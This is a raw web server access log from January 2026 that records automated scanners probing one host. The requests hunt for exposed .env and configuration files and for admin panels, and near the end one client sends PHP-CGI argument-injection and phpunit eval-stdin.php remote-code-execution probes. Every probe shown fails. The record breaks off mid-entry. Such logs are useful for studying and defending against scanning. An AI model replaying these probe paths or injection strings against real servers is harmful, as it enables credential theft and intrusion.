91.82.83.208 "/" [Client 87.121.84.15] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[19/Jan/2026:02:14:47 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:02:14:55 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1_2 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7D11 Safari/528.16" "-" +[19/Jan/2026:02:14:56 +0000] 400 - GET http 91.82.83.208 "/config/.env.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[19/Jan/2026:02:14:56 +0000] 404 - GET http 91.82.83.208 "/app/.env.admin" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 5.0; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0" "-" +[19/Jan/2026:02:14:56 +0000] 404 - GET http 91.82.83.208 "/config/dev.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; yie; rv:11.0) like Gecko" "-" +[19/Jan/2026:02:14:57 +0000] 404 - GET http 91.82.83.208 "/api/config.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MDDRJS)" "-" +[19/Jan/2026:02:14:57 +0000] 404 - GET http 91.82.83.208 "/config/env.php" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; BLL-L22 Build/HUAWEIBLL-L22) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36" "-" +[19/Jan/2026:02:14:58 +0000] 404 - GET http 91.82.83.208 "/config/env.txt" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.0.3; en-gb; KFOT Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[19/Jan/2026:02:14:58 +0000] 404 - GET http 91.82.83.208 "/configs/db.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.1.1; en-gb; Endeavour 800NG Build/JRO03C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[19/Jan/2026:02:14:58 +0000] 404 - GET http 91.82.83.208 "/configura/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 OPR/49.0.2725.64" "-" +[19/Jan/2026:02:14:59 +0000] 404 - GET http 91.82.83.208 "/anaconda/..env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 OPR/40.0.2308.90" "-" +[19/Jan/2026:02:14:59 +0000] 404 - GET http 91.82.83.208 "/console/.env.1" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36" "-" +[19/Jan/2026:02:14:59 +0000] 404 - GET http 91.82.83.208 "/console/.env.2" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera/9.22 (Windows NT 5.1; U; SV1; MEGAUPLOAD 2.0; ru)" "-" +[19/Jan/2026:02:14:59 +0000] 404 - GET http 91.82.83.208 "/.env-vault.log" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; ms-office)" "-" +[19/Jan/2026:02:14:59 +0000] 404 - GET http 91.82.83.208 "/.env-admin.log" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Android 5.0.2; en-us) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.1" "-" +[19/Jan/2026:02:14:59 +0000] 404 - GET http 91.82.83.208 "/.env-scheduler" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36" "-" +[19/Jan/2026:02:15:00 +0000] 404 - GET http 91.82.83.208 "/.env-agent.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36" "-" +[19/Jan/2026:02:15:00 +0000] 404 - GET http 91.82.83.208 "/.env-cloud.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAFSJS)" "-" +[19/Jan/2026:02:15:00 +0000] 404 - GET http 91.82.83.208 "/.env-alert.log" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36" "-" +[19/Jan/2026:02:15:00 +0000] 404 - GET http 91.82.83.208 "/.env-cloud.log" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.52.7 (KHTML, like Gecko) Version/5.1.2 Safari/534.52.7" "-" +[19/Jan/2026:02:15:00 +0000] 404 - GET http 91.82.83.208 "/.env-stack.log" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20070602 Firefox/2.0.0.4" "-" +[19/Jan/2026:02:15:00 +0000] 404 - GET http 91.82.83.208 "/.env-webserver" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)" "-" +[19/Jan/2026:02:15:00 +0000] 404 - GET http 91.82.83.208 "/.env-stage.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera/9.80 (X11; Linux x86_64) Presto/2.12.388 Version/12.14" "-" +[19/Jan/2026:02:15:00 +0000] 404 - GET http 91.82.83.208 "/.env-stage.log" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.246.0 Safari/532.5" "-" +[19/Jan/2026:02:15:01 +0000] 404 - GET http 91.82.83.208 "/.env-ssl-chain" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera/9.80 (Linux i686; Opera Mobi/46154; MeeGo) Presto/2.11.355 Version/12.10" "-" +[19/Jan/2026:02:15:01 +0000] 404 - GET http 91.82.83.208 "/.env-sanitizer" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)" "-" +[19/Jan/2026:02:15:01 +0000] 404 - GET http 91.82.83.208 "/.env-trace.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36 OPR/51.0.2830.26" "-" +[19/Jan/2026:02:15:02 +0000] 404 - GET http 91.82.83.208 "/.env-trace.log" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 OPR/50.0.2762.58 (Edition Campaign 76)" "-" +[19/Jan/2026:02:15:02 +0000] 404 - GET http 91.82.83.208 "/.env-traceback" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36" "-" +[19/Jan/2026:02:15:02 +0000] 404 - GET http 91.82.83.208 "/.env-nginx.log" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36" "-" +[19/Jan/2026:02:15:02 +0000] 404 - GET http 91.82.83.208 "/.env-whois.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 6.0; MYA-L22 Build/HUAWEIMYA-L22) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36" "-" +[19/Jan/2026:02:15:02 +0000] 404 - GET http 91.82.83.208 "/.env-trail.log" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.25" "-" +[19/Jan/2026:02:18:22 +0000] 404 - GET http 91.82.83.208 "/owncloud/status.php" [Client 45.156.128.153] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:18:42 +0000] 404 - GET http 91.82.83.208 "/status.php" [Client 45.156.128.155] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:19:06 +0000] 200 - GET http 91.82.83.208 "/" [Client 45.156.128.154] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:19:24 +0000] 404 - GET http 91.82.83.208 "/showLogin.cc" [Client 45.156.128.152] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:19:39 +0000] 404 - GET http 91.82.83.208 "/webfig/" [Client 45.156.128.152] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:19:50 +0000] 200 - GET http 91.82.83.208 "/" [Client 45.156.128.154] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:19:50 +0000] 400 - GET http 91.82.83.208 "/js/NewWindow_2_all.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[19/Jan/2026:02:19:50 +0000] 404 - GET http 91.82.83.208 "/cgi-bin/main.pl" [Client 45.156.128.155] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:19:52 +0000] 404 - GET http 91.82.83.208 "/cgi-bin/authLogin.cgi" [Client 45.156.128.153] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:20:02 +0000] 404 - GET http 91.82.83.208 "/xmldata?item=all" [Client 45.156.128.153] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:20:02 +0000] 404 - GET http 91.82.83.208 "/OA_HTML/AppsLocalLogin.jsp" [Client 45.156.128.152] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:20:13 +0000] 404 - GET http 91.82.83.208 "/console" [Client 45.156.128.154] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:20:22 +0000] 400 - GET http 91.82.83.208 "/ext-js/app/common/zld_product_spec.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[19/Jan/2026:02:20:23 +0000] 404 - GET http 91.82.83.208 "/ssi.cgi/Login.htm" [Client 45.156.128.154] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:20:32 +0000] 404 - GET http 91.82.83.208 "/aspera/faspex/" [Client 45.156.128.152] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:20:32 +0000] 200 - GET http 91.82.83.208 "/" [Client 45.156.128.155] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:20:32 +0000] 404 - GET http 91.82.83.208 "/admin/" [Client 45.156.128.153] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:20:32 +0000] 400 - GET http 91.82.83.208 "/static/historypage.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[19/Jan/2026:02:20:40 +0000] 404 - GET http 91.82.83.208 "/login/login" [Client 45.156.128.152] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:20:41 +0000] 400 - GET http 91.82.83.208 "/zabbix/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[19/Jan/2026:02:20:50 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[19/Jan/2026:02:20:56 +0000] 400 - GET http 91.82.83.208 "/cf_scripts/scripts/ajax/ckeditor/ckeditor.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[19/Jan/2026:02:20:57 +0000] 404 - GET http 91.82.83.208 "/index.jsp" [Client 45.156.128.153] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:21:02 +0000] 404 - GET http 91.82.83.208 "/partymgr/control/main" [Client 45.156.128.153] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:21:07 +0000] 404 - GET http 91.82.83.208 "/Web/Auth" [Client 45.156.128.155] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:21:14 +0000] 404 - GET http 91.82.83.208 "/internal_forms_authentication" [Client 45.156.128.152] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:21:18 +0000] 404 - GET http 91.82.83.208 "/license.txt" [Client 45.156.128.153] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:21:22 +0000] 404 - GET http 91.82.83.208 "/wp-json" [Client 45.156.128.154] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:21:25 +0000] 404 - GET http 91.82.83.208 "/solr/" [Client 45.156.128.152] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:21:30 +0000] 404 - GET http 91.82.83.208 "/login.html" [Client 45.156.128.152] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:21:35 +0000] 404 - GET http 91.82.83.208 "/jasperserver/login.html" [Client 45.156.128.152] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:21:41 +0000] 404 - GET http 91.82.83.208 "/jasperserver-pro/login.html" [Client 45.156.128.152] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:21:47 +0000] 404 - GET http 91.82.83.208 "/jasperserverTest/login.html" [Client 45.156.128.152] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:21:51 +0000] 404 - GET http 91.82.83.208 "/Telerik.Web.UI.WebResource.axd?type=rau" [Client 45.156.128.155] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:21:55 +0000] 400 - GET http 91.82.83.208 "/favicon-32x32.png" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[19/Jan/2026:02:21:56 +0000] 404 - GET http 91.82.83.208 "/WebInterface/" [Client 45.156.128.154] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:22:07 +0000] 404 - GET http 91.82.83.208 "/sitecore/shell/sitecore.version.xml" [Client 45.156.128.155] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:22:13 +0000] 200 - GET http 91.82.83.208 "/" [Client 45.156.128.153] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:22:13 +0000] 404 - GET http 91.82.83.208 "/progs/homepage" [Client 45.156.128.155] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:22:13 +0000] 404 - GET http 91.82.83.208 "/sugar_version.json" [Client 45.156.128.153] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:22:22 +0000] 404 - GET http 91.82.83.208 "/helpdesk/WebObjects/Helpdesk.woa" [Client 45.156.128.153] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:22:26 +0000] 404 - GET http 91.82.83.208 "/api/session/properties" [Client 45.156.128.153] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:22:30 +0000] 400 - GET http 91.82.83.208 "/css/images/PTZOptics_powerby.png" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[19/Jan/2026:02:22:30 +0000] 404 - GET http 91.82.83.208 "/identity" [Client 45.156.128.154] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:22:33 +0000] 404 - GET http 91.82.83.208 "/login.do" [Client 45.156.128.154] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[19/Jan/2026:02:24:12 +0000] 400 - GET http 91.82.83.208 "/" [Client 199.45.155.89] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[19/Jan/2026:02:24:14 +0000] 400 - - http localhost "-" [Client 199.45.155.89] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:02:24:19 +0000] 400 - GET http 91.82.83.208 "/.well-known/security.txt" [Client 199.45.155.89] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[19/Jan/2026:02:27:46 +0000] 404 - GET http 91.82.83.208 "/version" [Client 118.193.38.178] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:02:27:46 +0000] 200 - GET http 91.82.83.208 "/" [Client 118.193.38.178] [Length 1033] [Gzip -] "-" "-" +[19/Jan/2026:02:27:47 +0000] 200 - GET http 91.82.83.208 "/" [Client 118.193.38.178] [Length 1033] [Gzip -] "-" "-" +[19/Jan/2026:02:27:47 +0000] 404 - GET http 91.82.83.208 "/v1" [Client 118.193.38.178] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:02:27:47 +0000] 200 - GET http 91.82.83.208 "/" [Client 118.193.38.178] [Length 1033] [Gzip -] "-" "-" +[19/Jan/2026:02:27:50 +0000] 200 - GET http 91.82.83.208 "/" [Client 118.193.38.178] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[19/Jan/2026:02:34:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 45.194.70.251] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 9_0) AppleWebKit/548.50 (KHTML, like Gecko) Chrome/50.0.1653 Safari/537.36" "-" +[19/Jan/2026:02:34:25 +0000] 404 - GET http 91.82.83.208 "/sitemap.xml" [Client 45.194.70.251] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[19/Jan/2026:02:34:25 +0000] 404 - GET http 91.82.83.208 "/robots.txt" [Client 45.194.70.251] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[19/Jan/2026:02:39:53 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[19/Jan/2026:02:52:49 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:03:00:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:03:13:03 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 128.199.103.139] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:03:13:04 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 128.199.103.139] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:03:13:04 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:05 +0000] 405 - POST http 91.82.83.208 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 128.199.103.139] [Length 154] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:06 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:07 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:08 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:08 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:09 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:10 +0000] 404 - GET http 91.82.83.208 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:11 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:12 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:12 +0000] 404 - GET http 91.82.83.208 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:13 +0000] 404 - GET http 91.82.83.208 "/phpunit/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:14 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:15 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:15 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:16 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:17 +0000] 404 - GET http 91.82.83.208 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:18 +0000] 404 - GET http 91.82.83.208 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:18 +0000] 404 - GET http 91.82.83.208 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:19 +0000] 404 - GET http 91.82.83.208 